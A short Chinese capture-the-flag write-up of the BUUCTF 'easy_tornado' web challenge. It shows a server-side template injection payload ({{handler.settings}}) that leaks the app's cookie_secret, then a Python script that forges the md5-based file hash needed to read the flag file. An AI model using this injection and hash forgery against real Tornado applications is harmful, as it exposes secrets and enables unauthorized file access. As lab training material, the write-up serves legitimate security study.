BUUCTF web easy_tornado

网站存在以下三个目录

/flag.txt
flag in /fllllllllllllag

/welcome.txt
render

知识点1： render是python中的一个渲染函数，渲染变量到模板中，即可以通过传递不同的参数形成不同的页面。

/hints.txt
md5(cookie_secret+md5(filename))

随便点进去一个，发现url变为?filename=/hints.txt&filehash=e2898b8280e949ad882875ab0f3f419e
把filename改成/fllllllllllllag,提示错误。 url为?msg=Error
看大佬的WP， 存在模板注入(之前都没听说过)， 改成?msg={{handler.settings}}试试
显示出cookie_secret

python脚本获取md5值

import hashlib

 
def md5value(s):
    md5 = hashlib.md5() 
    md5.update(s) 
    return md5.hexdigest()

 
def encode(): 
    filename = '/fllllllllllllag'
    cookie_s ="18350aee-4e87-45f2-a56e-3ecffbdbf543"
    print(md5value(filename.encode('utf-8')))
    x=md5value(filename.encode('utf-8'))
    y=cookie_s+x
    print(md5value(y.encode('utf-8')))
 
 
encode()

拿着filename和filehash传参访问，得到flag。

模板注入什么的真的看不懂…